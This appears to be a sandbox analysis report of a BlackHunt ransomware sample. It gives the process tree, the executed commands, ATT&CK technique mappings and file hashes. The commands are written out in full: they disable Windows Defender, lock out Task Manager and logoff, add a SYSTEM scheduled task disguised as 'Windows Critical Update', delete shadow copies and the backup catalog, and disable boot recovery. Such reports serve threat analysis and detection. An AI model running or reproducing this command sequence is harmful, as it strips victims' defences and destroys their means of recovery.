-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:4200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3128
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1176
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:5812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1288
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2276
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:6060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1156
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3136
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe" /F2⤵PID:2028
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe" /F3⤵
- Creates scheduled task(s)
PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4028
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3316
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3172
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:180
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2968
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2772
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:3112
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Adds Run key to start application
PID:4200
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5132
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5228
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5220
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies registry class
PID:1888 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4924
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:888
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1088
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6396
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5abb882131e5dff48eb51ae623bb79134
SHA100958ce27e63f3a7db560ad35b7c6a14d4ed0efc
SHA256328e591ad069c6d99f9641ec0ff0056ca582819ff23e02c4deedec22da6e623a
SHA512a847bd5bf982fa163f12f30fd96905da5b3cad8ee4bae558e9a5e28eac6b91714cc12c011148d3d26b22126c8e198da6bfcf36cff2b21316b920e948a5923d10
-
Filesize
12KB
MD5bc6b323456cff1b87ab4901c8c35f1ee
SHA16cffec8af2d76a547c737e2e18cabd3e39231d47
SHA256a455b8ff97fd53d0d3f7dd48351e3cb2c079895851554248b7776751afae8811
SHA5123125d3987310cecd81e19cdc4eec501ec59a2679cd6cf71d748b0e872614094a4f2aaa44bcb9aadab695291774cf0d88ba5a736f0fdb456f017d7d9a3407f3ef
-
Filesize
684B
MD52b3f31a3630e57acbd6946237e3de2ef
SHA1d007c2411b49cd40dcd3410885377465d6b18c55
SHA2563f0c106503ec63b4d21fbcd9105b130a167d3b60e2e6ff3a61f6cba744977aa9
SHA5128d5f1a90f6896aced2c4acd53aa207812d5e9c004ffa429df97e1b3f7e7022275e033efb3fc025aa6062ded99d1a2629efa8017ab0285571eccb7f2625d9ac21